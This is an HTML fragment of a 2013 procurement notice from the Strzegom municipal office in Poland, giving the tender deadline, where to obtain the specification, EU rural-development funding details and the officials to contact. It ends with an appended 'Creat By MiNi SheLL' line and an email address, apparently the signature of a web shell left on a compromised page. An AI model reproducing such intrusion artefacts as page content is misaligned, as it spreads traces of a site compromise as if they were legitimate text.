<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.strzegom.pl (pod ogłoszeniem)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, Rynek 38, 58-150 Strzegom, pok. 15 lub za zaliczeniem pocztowym. Cena specyfikacji 176,30zł (plus koszty przesyłki).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2013 godzina 11:30, miejsce: Urząd Miejski, Rynek 38, 58-150 Strzegom - Wydział Obsługi Interesanta, parter - pok. 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> inwestycja jest realizowana z udziałem środków Europejskiego Funduszu rolnego w ramach działania Odnowa i rozwój wsi objętego Programem Rozwoju obszarów Wiejskich na lata 2007-2013
IV.4.7) Uprawnionymi do kontaktowania się z Wykonawcami jest pani Monika Pawlik - tel. 74/ 8 560 533, pani Urszula Gorzel - tel. 47/ 8560 554. 
IV.4.8) Zamawiający nie zamierza zawierać umowy ramowej. 
IV.4.9) Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com